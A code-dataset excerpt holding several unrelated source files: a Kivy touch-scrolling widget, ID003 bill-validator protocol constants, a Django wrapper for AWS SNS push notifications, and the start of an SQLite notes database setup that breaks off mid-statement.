0))\r\n\r\n def scroll_to_widget(self, widget, padding=10, animate=True):\r\n '''Scrolls the viewport to ensure that the given widget is visible,\r\n optionally with padding and animation. If animate is True (the\r\n default), then the default animation parameters will be used.\r\n Otherwise, it should be a dict containing arguments to pass to\r\n :class:`~kivy.animation.Animation` constructor.\r\n .. versionadded:: 1.9.1\r\n '''\r\n if not self.parent:\r\n return\r\n\r\n # if _viewport is layout and has pending operation, reschedule\r\n if hasattr(self._viewport, 'do_layout'):\r\n if self._viewport._trigger_layout.is_triggered:\r\n Clock.schedule_once(\r\n lambda *dt: self.scroll_to_widget(widget, padding, animate))\r\n return\r\n\r\n if isinstance(padding, (int, float)):\r\n padding = (padding, padding)\r\n\r\n pos = self.parent.to_widget(*widget.to_window(*widget.pos))\r\n cor = self.parent.to_widget(*widget.to_window(widget.right, widget.top))\r\n\r\n dx = dy = 0\r\n\r\n if pos[1] < self.y:\r\n dy = self.y - pos[1] + dp(padding[1])\r\n elif cor[1] > self.top:\r\n dy = self.top - cor[1] - dp(padding[1])\r\n\r\n if pos[0] < self.x:\r\n dx = self.x - pos[0] + dp(padding[0])\r\n elif cor[0] > self.right:\r\n dx = self.right - cor[0] - dp(padding[0])\r\n\r\n dsx, dsy = self.convert_distance_to_scroll(dx, dy)\r\n sxp = min(1, max(0, self.scroll_x - dsx))\r\n syp = min(1, max(0, self.scroll_y - dsy))\r\n\r\n if animate:\r\n if animate is True:\r\n animate = {'d': 0.2, 't': 'out_quad'}\r\n Animation.stop_all(self, 'scroll_x', 'scroll_y')\r\n Animation(scroll_x=sxp, scroll_y=syp, **animate).start(self)\r\n else:\r\n self.scroll_x = sxp\r\n self.scroll_y = syp\r\n\r\n def scroll_to(self, per_x, per_y, animate=True):\r\n sxp = min(1, max(0, per_x))\r\n syp = min(1, max(0, per_y))\r\n Animation.stop_all(self, 'scroll_x', 'scroll_y')\r\n if animate:\r\n if animate is True:\r\n animate = {'d': 0.2, 't': 'out_quad'}\r\n Animation(scroll_x=sxp, scroll_y=syp, **animate).start(self)\r\n else:\r\n self.scroll_x = sxp\r\n self.scroll_y = syp\r\n\r\n def scroll_by(self, per_x, per_y, animate=True):\r\n self.scroll_to(self.scroll_x + per_x, self.scroll_y + per_y, animate=animate)\r\n\r\n def convert_distance_to_scroll(self, dx, dy):\r\n '''Convert a distance in pixels to a scroll distance, depending on the\r\n content size and the scrollview size.\r\n The result will be a tuple of scroll distance that can be added to\r\n :data:`scroll_x` and :data:`scroll_y`\r\n '''\r\n if not self._viewport:\r\n return 0, 0\r\n vp = self._viewport\r\n if vp.width > self.width:\r\n sw = vp.width - self.width\r\n sx = dx / float(sw)\r\n else:\r\n sx = 0\r\n if vp.height > self.height:\r\n sh = vp.height - self.height\r\n sy = dy / float(sh)\r\n else:\r\n sy = 1\r\n return sx, sy\r\n\r\n def update_from_scroll(self, *largs):\r\n '''Force the reposition of the content, according to current value of\r\n :attr:`scroll_x` and :attr:`scroll_y`.\r\n This method is automatically called when one of the :attr:`scroll_x`,\r\n :attr:`scroll_y`, :attr:`pos` or :attr:`size` properties change, or\r\n if the size of the content changes.\r\n '''\r\n if not self._viewport:\r\n self.g_translate.xy = self.pos\r\n return\r\n vp = self._viewport\r\n\r\n # update from size_hint\r\n if vp.size_hint_x is not None:\r\n w = vp.size_hint_x * self.width\r\n if vp.size_hint_min_x is not None:\r\n w = max(w, vp.size_hint_min_x)\r\n if vp.size_hint_max_x is not None:\r\n w = min(w, vp.size_hint_max_x)\r\n vp.width = w\r\n\r\n if vp.size_hint_y is not None:\r\n h = vp.size_hint_y * self.height\r\n if vp.size_hint_min_y is not None:\r\n h = max(h, vp.size_hint_min_y)\r\n if vp.size_hint_max_y is not None:\r\n h = min(h, vp.size_hint_max_y)\r\n vp.height = h\r\n\r\n if vp.width > self.width:\r\n sw = vp.width - self.width\r\n x = self.x - self.scroll_x * sw\r\n else:\r\n x = self.x\r\n\r\n if vp.height > self.height:\r\n sh = vp.height - self.height\r\n y = self.y - self.scroll_y * sh\r\n else:\r\n y = self.top - vp.height\r\n\r\n # from 1.8.0, we now use a matrix by default, instead of moving the\r\n # widget position behind. We set it here, but it will be a no-op most\r\n # of the time.\r\n vp.pos = 0, 0\r\n self.g_translate.xy = x, y\r\n\r\n def add_widget(self, widget, *args, **kwargs):\r\n if self._viewport:\r\n raise Exception('ScrollView accept only one widget')\r\n canvas = self.canvas\r\n self.canvas = self.canvas_viewport\r\n super().add_widget(widget, *args, **kwargs)\r\n self.canvas = canvas\r\n self._viewport = widget\r\n widget.bind(size=self._trigger_update_from_scroll, size_hint_min=self._trigger_update_from_scroll)\r\n self._trigger_update_from_scroll()\r\n\r\n def remove_widget(self, widget, *args, **kwargs):\r\n canvas = self.canvas\r\n self.canvas = self.canvas_viewport\r\n super().remove_widget(widget, *args, **kwargs)\r\n self.canvas = canvas\r\n if widget is self._viewport:\r\n self._viewport = None\r\n\r\n\r\nclass TouchScroller(BasicScroller):\r\n \"\"\"\r\n Modified version of Kivy's ScrollView widget, allows for finer control over touch events.\r\n allow_middle_mouse: set this to True to enable scrolling with the middle mouse button (blocks middle mouse clicks on child widgets).\r\n allow_flick: set this to True to enable touch 'flicks' to scroll the view.\r\n allow_drag: Set this to True to enable click-n-drag scrolling within the scrollview itself.\r\n allow_wheel: set this to True to enable scrolling via the mouse wheel.\r\n exclude_widgets: ListProperty, add any child widgets to this, and they will receive all touches on them, blocking any touch controlls of this widget within their bounds.\r\n \"\"\"\r\n\r\n scroll_distance = NumericProperty(_scroll_distance)\r\n scroll_timeout = NumericProperty(_scroll_timeout)\r\n scroll_wheel_distance = NumericProperty('20sp')\r\n\r\n allow_middle_mouse = BooleanProperty(True)\r\n allow_flick = BooleanProperty(True)\r\n allow_drag = BooleanProperty(True)\r\n allow_wheel = BooleanProperty(True)\r\n exclude_widgets = ListProperty()\r\n\r\n _touch_moves = 0\r\n _touch_delay = None\r\n _start_scroll_x = 0\r\n _start_scroll_y = 0\r\n\r\n def do_touch_down(self, touch):\r\n if self.collide_point(*touch.pos):\r\n for widget in self.exclude_widgets:\r\n touch.push()\r\n #touch.apply_transform_2d(self.to_local)\r\n touch.apply_transform_2d(self.to_widget)\r\n if widget.collide_point(*touch.pos):\r\n return super().on_touch_down(touch)\r\n touch.pop()\r\n\r\n #delay touch to check if scroll is initiated\r\n if 'button' in touch.profile and touch.button.startswith('scroll'):\r\n if self.allow_wheel:\r\n touch.grab(self)\r\n btn = touch.button\r\n return self.wheel_scroll(btn)\r\n else:\r\n return self.transformed_touch(touch)\r\n\r\n touch.grab(self)\r\n self._touch_delay = None\r\n self._touch_moves = 0\r\n\r\n self._start_scroll_x = self.scroll_x\r\n self._start_scroll_y = self.scroll_y\r\n if self.allow_middle_mouse and 'button' in touch.profile and touch.button == 'middle':\r\n return True\r\n if self.allow_drag or self.allow_flick:\r\n self._touch_delay = Clock.schedule_once(partial(self._on_touch_down_delay, touch), (self.scroll_timeout / 1000))\r\n else:\r\n return self.transformed_touch(touch)\r\n return True\r\n\r\n def do_touch_up(self, touch):\r\n if touch.grab_current == self:\r\n touch.ungrab(self)\r\n if self.allow_middle_mouse and 'button' in touch.profile and touch.button == 'middle':\r\n return True\r\n if self._touch_delay:\r\n self._touch_delay.cancel()\r\n self._touch_delay = None\r\n dx, dy = self.touch_moved_distance(touch)\r\n if self.allow_flick and (dx or dy):\r\n per_x = self.scroll_x - ((dx * 2) / self.width)\r\n per_y = self.scroll_y - ((dy * 2) / self.height)\r\n self.scroll_to(per_x, per_y)\r\n self._touch_delay = None\r\n return True\r\n else:\r\n self.transformed_touch(touch)\r\n return self.transformed_touch(touch, 'up')\r\n\r\n def _on_touch_down_delay(self, touch, *largs):\r\n self._touch_delay = None\r\n dx, dy = self.touch_moved_distance(touch)\r\n if self.allow_drag and (dx or dy):\r\n #user has satisfied the requirements for scrolling\r\n return True\r\n else:\r\n touch.ungrab(self)\r\n #Need to fix the touch position since it has been translated by this widget's position somehow...\r\n touch.push()\r\n touch.apply_transform_2d(self.to_widget)\r\n touch.apply_transform_2d(self.to_parent)\r\n return self.transformed_touch(touch)\r\n\r\n def do_touch_move(self, touch):\r\n middle_button = 'button' in touch.profile and touch.button == 'middle'\r\n if not self.allow_drag and not middle_button:\r\n return\r\n if self._touch_delay:\r\n always = False\r\n else:\r\n always = True\r\n if touch.grab_current == self:\r\n self._touch_moves += 1\r\n if self._touch_moves == 1 and not middle_button:\r\n animate = True\r\n else:\r\n animate = False\r\n dx, dy = self.touch_moved_distance(touch, always=always)\r\n if self.viewport_size[0] != self.width:\r\n per_x = self._start_scroll_x + (dx / (self.width - self.viewport_size[0]))\r\n else:\r\n per_x = self._start_scroll_x\r\n if self.viewport_size[1] != self.height:\r\n per_y = self._start_scroll_y + (dy / (self.height - self.viewport_size[1]))\r\n else:\r\n per_y = self._start_scroll_y\r\n self.scroll_to(per_x, per_y, animate=animate)\r\n\r\n def touch_moved_distance(self, touch, always=False):\r\n #determines if the touch has moved the required distance to allow for scrolling\r\n can_move_x = self.viewport_size[0] > self.width\r\n can_move_y = self.viewport_size[1] > self.height\r\n dx = touch.pos[0] - touch.opos[0]\r\n dy = touch.pos[1] - touch.opos[1]\r\n if can_move_x and (always or abs(dx) >= self.scroll_distance):\r\n pass\r\n else:\r\n dx = 0\r\n if can_move_y and (always or abs(dy) >= self.scroll_distance):\r\n pass\r\n else:\r\n dy = 0\r\n \r\n return dx, dy\r\n\r\n def wheel_scroll(self, btn):\r\n can_move_x = self.viewport_size[0] > self.width\r\n can_move_y = self.viewport_size[1] > self.height\r\n scroll_percent_x = self.scroll_wheel_distance / self.viewport_size[0]\r\n scroll_percent_y = self.scroll_wheel_distance / self.viewport_size[1]\r\n\r\n if can_move_x and can_move_y:\r\n if btn == 'scrollup':\r\n self.scroll_by(0, scroll_percent_y, animate=False)\r\n elif btn == 'scrolldown':\r\n self.scroll_by(0, 0 - scroll_percent_y, animate=False)\r\n elif btn == 'scrollleft':\r\n self.scroll_by(scroll_percent_x, 0, animate=False)\r\n elif btn == 'scrollright':\r\n self.scroll_by(0 - scroll_percent_x, 0, animate=False)\r\n elif can_move_x:\r\n if btn in ['scrolldown', 'scrollleft']:\r\n self.scroll_by(scroll_percent_x, 0, animate=False)\r\n elif btn in ['scrollup', 'scrollright']:\r\n self.scroll_by(0 - scroll_percent_x, 0, animate=False)\r\n elif can_move_y:\r\n if btn in ['scrolldown', 'scrollright']:\r\n self.scroll_by(0, scroll_percent_y, animate=False)\r\n elif btn in ['scrollup', 'scrollleft']:\r\n self.scroll_by(0, 0 - scroll_percent_y, animate=False)\r\n return True\r\n","repo_name":"snuq/KivyExamples","sub_path":"Basic Scroller/basicscroller.py","file_name":"basicscroller.py","file_ext":"py","file_size_in_byte":24333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13178424299","text":"# -*- coding: utf-8 -*-\n# Autor: Matias Novoa\n# Año: 2014\n# Licencia: GNU/GPL V3 http://www.gnu.org/copyleft/gpl.html\n#\n# states\nNOT_SENT = 0\nSENDING = 1\nSENT = 2\n\n# Command codes\nSYNC = 'FC'\nLNG_5 = '05'\nLNG_6 = '06'\nLNG_7 = '07'\n# Operation command\nRESET = '40'\nSTACK_1 = '41'\nSTACK_2 = '42'\nRETURN = '43'\nHOLD = '44'\nWAIT = '45'\n# ACK\nACK = '50'\n# Setting Command\nENABLE = 'C0'\nSECURITY = 'C1'\nCOMMUNICATION = 'C2'\nINHIBIT = 'C3'\nDIRECTION = 'C4'\nOPTIONAL = 'C5'\n# Setting status request\nREQ_STATUS = '11'\nREQ_ENABLE = '80'\nREQ_SECURITY = '81'\nREQ_COMMUNICATION = '82'\nREQ_INHIBIT = '83'\nREQ_DIRECTION = '84'\nREQ_OPTIONAL = '85'\nREQ_VERSION = '88'\nREQ_BOOT = '89'\nREQ_CURRENCY = '8A'\n\n# denominations to accept\nBVU_ACCEPT_1 = 0x01\nBVU_ACCEPT_5 = 0x04\nBVU_ACCEPT_10 = 0x08\nBVU_ACCEPT_20 = 0x10\nBVU_ACCEPT_50 = 0x20\nBVU_ACCEPT_100 = 0x40\n\n# denominations accepted\nBILL_VALUE = {\n '62': 2,\n '63': 5,\n '64': 10,\n '65': 20,\n '66': 50,\n '67': 100\n }\n\n# generic denomination codes\nBVU_ESCROW_61 = 0x61\nBVU_ESCROW_62 = 0x62\nBVU_ESCROW_63 = 0x63\nBVU_ESCROW_64 = 0x64\nBVU_ESCROW_65 = 0x65\nBVU_ESCROW_66 = 0x66\nBVU_ESCROW_67 = 0x67\nBVU_ESCROW_68 = 0x68\nBVU_ESCROW_69 = 0x69\nBVU_ESCROW_6A = 0x6A\nBVU_ESCROW_6B = 0x6B\nBVU_ESCROW_6C = 0x6C\nBVU_ESCROW_6D = 0x6D\nBVU_ESCROW_6E = 0x6E\nBVU_ESCROW_6F = 0x6F\n\n# accepted directions\nBVU_DIRECTION_A = '01'\nBVU_DIRECTION_B = '02'\nBVU_DIRECTION_C = '03'\nBVU_DIRECTION_D = '04'\n\n# failure codes ID003\nFAILURE_DATA = {\n 'a2': 'Stack motor failure',\n 'a5': 'Transport(feed) motor speed failure',\n 'a6': 'Transport(feed) motor failure',\n 'a8': 'Selenoid failure',\n 'a9': 'PB unit failure',\n 'ab': 'Cash box not ready',\n 'af': 'Validator head remove',\n 'b0': 'BOOT ROM failure',\n 'b1': 'External ROM failure',\n 'b2': 'RAM failure',\n 'b3': 'External ROM writing failure'\n }\n\n# failure codes ICB\nBVU_FAILURE_ICB_02 = 0x02\nBVU_FAILURE_ICB_03 = 0x03\nBVU_FAILURE_ICB_04 = 0x04\nBVU_FAILURE_ICB_07 = 0x07\nBVU_FAILURE_ICB_08 = 0x08\nBVU_FAILURE_ICB_09 = 0x09\n\n# Status Results\nSTATUS_RESULT = {\n '11': 'IDLING',\n '12': 'ACCEPTING',\n '13': 'ESCROW',\n '14': 'STACKING',\n '15': 'VEND_VALID',\n '16': 'STACKED',\n '17': 'REJECTING',\n '18': 'RETURNING',\n '19': 'HOLDING',\n '1a': 'DISABLED',\n '1b': 'INITIALIZING',\n '40': 'POWER UP',\n '41': 'POWER UP BILL IN ACCEPTOR',\n '42': 'POWER UP BILL IN STACKER',\n '43': 'STACKER FULL',\n '44': 'STACKER OPEN',\n '45': 'JAM IN ACCEPTOR',\n '46': 'JAM IN STACKER',\n '47': 'PAUSE',\n '48': 'CHEATED',\n '49': 'FAILURE',\n '4a': 'COMMUNICATION ERROR',\n '50': 'ACK'\n }\n\n# REJECTING DATA\n\nREJECT_DATA = {\n '71': 'Insertion error',\n '72': 'Mug error',\n '73': 'Return action due to residual bills',\n '74': 'Calibration / magnification error',\n '75': 'Conveying error',\n '76': 'Discrimination error for bill denomination',\n '77': 'Photo pattern error',\n '78': 'Photo level error',\n '79': 'Return by INHIBIT: error of insertion direction',\n '7a': 'None',\n '7b': 'Operation error',\n '7c': 'Return action due to residual bills',\n '7d': 'Lenght error',\n '7e': 'Photo pattern error',\n '7f': 'True bill feature error'\n }\n# COMMUNICATION ERRORS\nDCB_ERROR = 0x01\nPORT_ALREADY_OPENED = 0x02\nPORT_SETTINGS_FAILED = 0x03\nINVALID_PORT = 0x04\nERROR_CE_BREAK = 0x05\nERROR_CE_FRAME = 0x06\nERROR_CE_IOE = 0x07\nERROR_CE_MODE = 0x08\nERROR_CE_OVERRUN = 0x09\nERROR_CE_RXOVER = 0x0A\nERROR_CE_RXPARITY = 0x0B\nERROR_CE_TXFULL = 0x0C\nRXTIME_OUT = 0x0D\nCRC_ERROR = 0x0E\n","repo_name":"mattgaviota/stone","sub_path":"lib/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70163118250","text":"import logging\nfrom abc import abstractmethod, abstractproperty\nimport json\nfrom boto.exception import BotoServerError\nimport re\nfrom django.db import models\nfrom scarface.platform_strategy import get_strategies\nfrom scarface.utils import DefaultConnection, PushLogger\nfrom scarface.exceptions import SNSNotCreatedException, PlatformNotSupported, \\\n SNSException, NotRegisteredException\n\n\nlogger = logging.getLogger('django_scarface')\n\n\nclass SNSCRUDMixin(object):\n\n @abstractproperty\n def resource_name(self):\n pass\n\n @property\n def response_key(self):\n '''\n Used for extracting the arn key from a response.\n '''\n return u'Create{0}Response'.format(self.resource_name)\n\n @property\n def result_key(self):\n '''\n Used for extracting the arn key from a response.\n '''\n return u'Create{0}Result'.format(self.resource_name)\n\n @property\n def arn_key(self):\n '''\n Used for extracting the arn key from a response.\n '''\n return u'{0}Arn'.format(self.resource_name)\n\n @property\n def is_registered(self):\n '''\n Returns whether the the instance is registered\n to SNS or not\n '''\n return self.arn and len(self.arn) > 0\n\n def is_registered_or_register(self):\n if not self.is_registered:\n return self.register()\n return True\n\n def set_arn_from_response(self, response_dict):\n \"\"\"\n Extracts the arn key from a boto response dict.\n :type response_dict: dict\n :param response_dict:\n :rtype boolean:\n :return :\n \"\"\"\n success = False\n try:\n self.arn = response_dict[self.response_key][self.result_key][\n self.arn_key]\n success = True\n except KeyError:\n pass\n return success\n\n @abstractmethod\n def register(self, connection=None):\n \"\"\"\n Registers the instance to SNS.\n :param connection:\n :rtype boolean:\n :return: if create was successful\n \"\"\"\n pass\n\n\nclass Application(models.Model):\n '''\n Main access point for the scarface library. Is used\n to manage the different platforms.\n '''\n name = models.CharField(\n max_length=255,\n unique=True\n )\n\n def __str__(self):\n return self.name\n\n def get_device(self, device_id):\n '''\n Returns a device by its device_id.\n '''\n return self.devices.get(udid=device_id)\n\n def get_topic(self, name):\n '''\n Returns a topic by its name.\n '''\n return self.topics.get(name=name)\n\n def get_or_create_topic(self, name):\n '''\n Returns a topic by its name. If the topic is\n not yet registered with this application the\n topic is created.\n :return: Topic, created\n :exception SNSException\n '''\n try:\n return self.topics.get(name=name), False\n except Topic.DoesNotExist:\n topic = Topic.objects.create(\n application=self,\n name=name\n )\n topic.register()\n topic.save()\n return topic, True\n\n def get_platform(self, platform_type):\n\n try:\n return self.platforms.get(platform=platform_type)\n except Platform.DoesNotExist:\n raise PlatformNotSupported\n\n\nclass Device(SNSCRUDMixin, models.Model):\n '''\n Device class for registering a end point to\n SNS.\n '''\n\n device_id = models.CharField(\n max_length=255,\n )\n\n platform = models.ForeignKey(\n to='Platform',\n on_delete=models.CASCADE,\n related_name='devices'\n )\n\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n\n push_token = models.CharField(\n max_length=512,\n )\n\n topics = models.ManyToManyField(\n to='Topic',\n through='Subscription'\n )\n\n class Meta:\n unique_together = (('device_id', 'platform'))\n\n @property\n def resource_name(self):\n return 'PlatformEndpoint'\n\n @property\n def arn_key(self):\n return \"EndpointArn\"\n\n @DefaultConnection\n def register(self, custom_user_data='', connection=None):\n '''\n :exception SNSException\n '''\n self.platform.is_registered_or_register()\n response = connection.create_platform_endpoint(\n self.platform.arn,\n self.push_token,\n custom_user_data=custom_user_data\n )\n success = self.set_arn_from_response(response)\n if not success:\n raise SNSException(\n 'Failed to register Device.({0})'.format(success)\n )\n self.save()\n return success\n\n @DefaultConnection\n def register_or_update(self, new_token=None, custom_user_data=u\"\",\n connection=None):\n '''\n Registers the device to SNS. If the device was\n previously registered the registration is updated.\n :return: True if the registration/update was successful\n '''\n if self.is_registered:\n result = self.update(new_token, custom_user_data, connection)\n else:\n try:\n result = self.register(custom_user_data, connection)\n # Heavily inspired by http://stackoverflow.com/a/28316993/270265\n except BotoServerError as err:\n result_re = re.compile(r'Endpoint(.*)already', re.IGNORECASE)\n result = result_re.search(err.message)\n if result:\n arn = result.group(0).replace('Endpoint ', '').replace(\n ' already', '')\n self.arn = arn\n self.update(new_token, custom_user_data, connection)\n else:\n sns_exc = SNSNotCreatedException(err)\n sns_exc.message = err.message\n raise sns_exc\n\n return result\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n \"\"\"\n Dergisters the device from SNS.\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :param save: weather the device should be saved, after the device has\n been deregsitered.\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException()\n success = connection.delete_endpoint(self.arn)\n if not success:\n SNSException(\n 'Failed to deregister device.({0})'.format(success)\n )\n self.arn = None\n if save: self.save()\n return success\n\n @DefaultConnection\n def send_message(self, message, connection=None):\n if not self.is_registered:\n raise NotRegisteredException\n return connection.publish(message=message, target_arn=self.arn)\n\n @PushLogger\n @DefaultConnection\n def send(self, push_message, connection=None):\n \"\"\"\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException\n push_message = self.platform.format_payload(push_message)\n json_string = json.dumps(push_message)\n return connection.publish(\n message=json_string,\n target_arn=self.arn,\n message_structure=\"json\"\n )\n\n @DefaultConnection\n def update(self, new_token=None, custom_user_data=u\"\", connection=None):\n \"\"\"\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException\n\n new_token = new_token if new_token else self.push_token\n attributes = {\"Enabled\": True, \"Token\": new_token}\n if custom_user_data:\n attributes[\"CustomUserData\"] = custom_user_data\n answer = connection.set_endpoint_attributes(self.arn, attributes)\n self.is_enabled = True\n self.push_token = new_token\n return answer\n\n def sign(self, push_message):\n push_message.receiver_arn = self.arn\n push_message.message_type = PushMessage.MESSAGE_TYPE_TOPIC\n\n\nclass Platform(SNSCRUDMixin, models.Model):\n platform = models.CharField(\n max_length=255,\n )\n\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n\n application = models.ForeignKey(\n to=Application,\n on_delete=models.CASCADE,\n related_name='platforms'\n )\n\n credential = models.CharField(\n max_length=255,\n blank=True,\n null=True\n )\n\n principal = models.CharField(\n max_length=255,\n blank=True,\n null=True\n )\n\n def __str__(self):\n return \"{0} ({1})\".format(self.platform, self.application)\n\n class Meta:\n unique_together = ('application', 'platform')\n\n @property\n def app_name(self):\n return self.application.name\n\n @property\n def strategy(self):\n strategies = get_strategies()\n if self.platform in strategies.keys():\n return strategies[self.platform](self)\n else:\n raise PlatformNotSupported\n\n @property\n def name(self):\n return u\"_\".join([self.app_name, self.platform]).lower()\n\n @property\n def resource_name(self):\n return 'PlatformApplication'\n\n @property\n def attributes(self):\n return {\n \"PlatformCredential\": self.credential,\n \"PlatformPrincipal\": self.principal\n }\n\n @DefaultConnection\n def register(self, connection=None):\n \"\"\"\n Adds an app to SNS. Apps are per platform. The name of a\n sns application is app_platform.\n\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :rtype bool:\n :return:\n \"\"\"\n\n response = connection.create_platform_application(\n self.name,\n self.platform,\n self.attributes\n )\n if not response:\n raise SNSException(\n 'Failed to register Platform.{0}'.format(response)\n )\n return self.set_arn_from_response(response)\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n \"\"\"\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :return:\n \"\"\"\n if not self.is_registered:\n raise NotRegisteredException\n\n success = connection.delete_platform_application(self.arn)\n if not success:\n SNSException(\n 'Failded to deregister Platform.({0})'.format(success)\n )\n self.arn = None\n if save: self.save()\n return success\n\n @DefaultConnection\n def all_devices(self, connection=None):\n \"\"\"\n Returns all devices which are registred with this\n platform.\n\n :param connection:\n :return: List of Devices associated with this platform\n \"\"\"\n endpoint_arns = list()\n\n def get_next(nexttoken):\n response = connection.list_endpoints_by_platform_application(\n platform_application_arn=self.arn,\n next_token=nexttoken)\n result = response[u'ListEndpointsByPlatformApplicationResponse'][\n u'ListEndpointsByPlatformApplicationResult']\n endpoints = result[u'Endpoints']\n for endpoint in endpoints:\n endpoint_arns.append(\n endpoint['EndpointArn']\n )\n\n return result[u'NextToken']\n\n next_token = get_next(None)\n\n while next_token:\n next_token = get_next(next_token)\n\n devices_list = list(Device.objects.filter(arn__in=endpoint_arns))\n\n return devices_list\n\n def format_payload(self, data):\n return self.strategy.format_payload(data)\n\n\nclass Topic(SNSCRUDMixin, models.Model):\n name = models.CharField(\n max_length=64\n )\n application = models.ForeignKey(\n to=Application,\n on_delete=models.CASCADE,\n related_name='topics'\n )\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n devices = models.ManyToManyField(\n to=Device,\n through='Subscription'\n )\n\n class Meta:\n unique_together = (('name', 'application'))\n\n @property\n def resource_name(self):\n return 'Topic'\n\n @property\n def full_name(self):\n return '_'.join([self.application.name, self.name])\n\n @DefaultConnection\n def register(self, connection=None):\n\n response = connection.create_topic(self.full_name)\n if not response:\n raise SNSException(\n 'Failed to register Topic. ({0})'.format(response)\n )\n self.set_arn_from_response(response)\n self.save()\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n if not self.is_registered:\n raise NotRegisteredException\n success = connection.delete_topic(self.arn)\n if not success:\n raise SNSException(\n 'Failed to deregister Topic. ({0})'.format(success)\n )\n\n self.arn = None\n if save: self.save()\n\n return success\n\n @DefaultConnection\n def register_device(self, device, connection=None):\n \"\"\"\n :type device: Device\n :param device:\n :type connection: SNSConnection\n :param connection: the connection which should be used.\n if the argument isn't set there will be created a default connection\n :rtype bool:\n :return:\n \"\"\"\n self.is_registered_or_register()\n device.is_registered_or_register()\n subscription, created = Subscription.objects.get_or_create(\n device=device,\n topic=self,\n )\n success = subscription.register(connection)\n return success\n\n @DefaultConnection\n def deregister_device(self, device, connection=None):\n if not device.is_registered:\n raise NotRegisteredException\n try:\n subscription = Subscription.objects.get(\n device=device,\n topic=self\n )\n subscription.deregister(connection)\n subscription.delete()\n except Subscription.DoesNotExist:\n logger.warn(\"Device is not registerd with topic.\")\n return False\n return True\n\n @DefaultConnection\n def all_subscriptions(self, connection=None):\n subscriptions_list = list()\n\n def get_next(nexttoken):\n response = connection.get_all_subscriptions_by_topic(\n topic=self.arn, next_token=nexttoken)\n result = response[\"ListSubscriptionsByTopicResponse\"][\n \"ListSubscriptionsByTopicResult\"]\n subs = result[u'Subscriptions']\n subscriptions_list.extend(subs)\n return result[u'NextToken']\n\n next_token = get_next(None)\n\n while next_token:\n next_token = get_next(next_token)\n\n return subscriptions_list\n\n def sign(self, push_message):\n push_message.receiver_arn = self.arn\n push_message.message_type = PushMessage.MESSAGE_TYPE_TOPIC\n\n @PushLogger\n @DefaultConnection\n def send(self, push_message, connection=None):\n \"\"\"\n\n :type push_message: PushMessage\n :param push_message:\n :type platforms:list\n :param platforms:\n :return:\n \"\"\"\n payload = dict()\n for platform in self.application.platforms.all():\n payload.update(platform.format_payload(push_message))\n payload[\"default\"] = push_message.message\n json_string = json.dumps(payload)\n return connection.publish(\n message=json_string,\n topic=self.arn,\n message_structure=\"json\"\n )\n\n\nclass PushMessage(models.Model):\n MESSAGE_TYPE_DEFAULT = 0\n MESSAGE_TYPE_TOPIC = 1\n sound = models.TextField(blank=True, null=True)\n message = models.TextField(default='', null=True)\n has_new_content = models.BooleanField(default=False)\n context_id = models.TextField(default='none', null=True)\n context = models.TextField(default='default', null=True)\n badge_count = models.SmallIntegerField(default=0)\n extra_payload = models.TextField(blank=True, null=True)\n receiver_arn = models.TextField(blank=True, null=True)\n message_type = models.PositiveSmallIntegerField(default=0)\n\n def as_dict(self):\n d = {\n 'message': self.message,\n 'context': self.context,\n 'context_id': self.context_id,\n 'badge_count': self.badge_count,\n 'sound': self.sound,\n 'has_new_content': self.has_new_content\n }\n if self.extra_payload:\n d.update(self.extra_payload)\n return d\n\n\nclass Subscription(SNSCRUDMixin, models.Model):\n topic = models.ForeignKey(\n to=Topic,\n on_delete=models.CASCADE\n )\n\n device = models.ForeignKey(\n to=Device,\n on_delete=models.CASCADE\n )\n\n arn = models.CharField(\n max_length=255,\n null=True,\n blank=True\n )\n\n class Meta:\n unique_together = (('topic', 'device'))\n\n @property\n def response_key(self):\n return u'SubscribeResponse'\n\n @property\n def result_key(self):\n return u'SubscribeResult'\n\n @property\n def arn_key(self):\n return u'SubscriptionArn'\n\n @DefaultConnection\n def register(self, connection=None):\n self.device.is_registered_or_register()\n self.topic.is_registered_or_register()\n success = connection.subscribe(\n topic=self.topic.arn,\n endpoint=self.device.arn,\n protocol=\"application\"\n )\n if not success:\n raise SNSException(\n 'Failed to subscribe device to topic.({0})'.format(success)\n )\n self.set_arn_from_response(success)\n self.save()\n\n @DefaultConnection\n def deregister(self, connection=None, save=True):\n if not self.is_registered:\n raise NotRegisteredException\n success = connection.unsubscribe(self.arn)\n if not success:\n raise SNSException(\n 'Failed to unsubscribe Device from Topic.({0})'.format(success)\n )\n self.arn = None\n if save: self.save()\n return success\n","repo_name":"dreipol/django-scarface","sub_path":"scarface/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19163,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"23176465722","text":"from datetime import datetime\nfrom tkinter import messagebox\nimport sqlite3 as sql\nimport json\nimport os\n\n\ndef initialize_database() -> None:\n db = sql.connect(\"notes.db\")\n script = db.cursor()\n\n # Create Categories Table\n sql_query = \"CREATE Table IF NOT EXISTS Categories (\" \\\n \"category_id integer PRIMARY KEY AUTOINCREMENT NOT NULL,\" \\\n \"category_name text NOT NULL\" \\\n \")\"\n script.execute(sql_query)\n\n sql_query = \"INSERT INTO Categories (category_id, category_name) \" \\\n \"VALUES (0, \\\"None\\\")\"\n script.execute(sql_query)\n\n # Create Notes Table\n sql_query = \"CREATE Table IF NOT EXISTS 